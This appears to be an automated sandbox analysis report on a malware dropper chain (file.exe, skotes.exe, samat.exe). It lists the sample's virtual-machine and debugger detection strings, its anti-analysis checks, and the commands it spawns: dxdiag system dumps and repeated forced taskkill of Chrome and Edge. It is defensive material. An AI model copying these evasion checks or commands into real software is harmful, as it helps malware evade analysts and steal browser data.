Source: samat.exe, 00000008.00000002.4559869878.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025267001.000001BCCC88C000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4522921844.000001BCCC8C1000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4503744422.000001BCCC8A7000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3025997180.000001BCCC89B000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4510392887.000001BCCC8BF000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4505195812.000001BCCC8A9000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4548533682.000001BCCC8CB000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4537138300.000001BCCC8C6000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.3024006784.000001BCCC8C4000.00000004.00000020.00020000.00000000.sdmp, samat.exe, 00000008.00000003.4495443615.000001BCCC888000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmtoolsd.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvboxservice.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmwareuser.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: VMware SVGA 3D
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Microsoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dMicrosoft Hyper-V Video
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: dvmwareuser.exe
Source: samat.exe, 00000008.00000002.4561716513.000001BCCCB00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ro.kernel.qemu
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vmsrvc.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: vboxservice.exe
Source: file.exe, 00000000.00000002.2104728384.00000000008BD000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.2148371254.000000000099D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_053203B3 rdtsc 0_2_053203B3
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8DE80 GetModuleHandleW,LoadLibraryW,GetProcAddress,AddAccessAllowedAce,GetProcAddress,AddAccessDeniedAce,GetProcAddress,AddAccessAllowedAceEx,GetProcAddress,AddMandatoryAce,GetProcAddress,AddAccessAllowedObjectAce,GetProcAddress,AddAccessDeniedAceEx,GetProcAddress,AddAccessDeniedObjectAce,GetProcAddress,AddAuditAccessAceEx,GetProcAddress,AddAuditAccessObjectAce,GetProcAddress,SetSecurityDescriptorControl,InitializeCriticalSection,TlsAlloc,DeleteCriticalSection,TlsFree, 8_2_00007FF8B7E8DE80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E3480 GetProcessHeap, 7_2_00007FF7E12E3480
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\System32\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD30C SetUnhandledExceptionFilter, 7_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 7_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 7_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CD30C SetUnhandledExceptionFilter, 8_2_00007FF7E12CD30C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CD12C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF7E12CD12C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12DA614 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF7E12DA614
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF7E12CC8A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF7E12CC8A0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8FBFC SetUnhandledExceptionFilter, 8_2_00007FF8B7E8FBFC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8FA14 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7E8FA14
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E8E8FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7E8E8FC
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EC0854 SetUnhandledExceptionFilter, 8_2_00007FF8B7EC0854
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EBFA68 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7EBFA68
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EC066C IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7EC066C
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE1A80 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B7EE1A80
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7EE1030 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B7EE1030
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8112920 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8112920
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8261960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8261390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8261390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8271390 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8271390
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8271960 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8271960
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8283248 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00007FF8B8283248
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B8282C90 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00007FF8B8282C90
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe "C:\Users\user\AppData\Local\Temp\1008029001\samat.exe"
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\dxdiag.exe dxdiag /t C:\Users\user\AppData\Local\Bunny\Info.txt
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exe
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E87EB0 PyArg_ParseTuple,PyExc_TypeError,PyErr_SetString,GetSecurityDescriptorDacl,free,SetSecurityDescriptorDacl,GetSecurityDescriptorOwner,free,GetSecurityDescriptorGroup,free,free,free, 8_2_00007FF8B7E87EB0
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 8_2_00007FF8B7E88D60 PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PyErr_Clear,PyArg_ParseTuple,PySequence_Check,PyExc_TypeError,PyErr_SetString,PySequence_Size,PySequence_Tuple,PyArg_ParseTuple,_Py_Dealloc,AllocateAndInitializeSid,PyExc_ValueError,PyErr_SetString,_Py_NewReference,malloc,memset,memcpy, 8_2_00007FF8B7E88D60
Source: skotes.exe, skotes.exe, 00000003.00000002.2152160498.000000000099D000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: }Program Manager
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E9570 cpuid 7_2_00007FF7E12E9570
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: unknown VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Cipher VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Hash VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\PublicKey VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\Crypto\Util VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\certifi VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\charset_normalizer VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\importlib_metadata-8.0.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI52282\setuptools\_vendor\wheel-0.43.0.dist-info VolumeInformation Jump to behavior
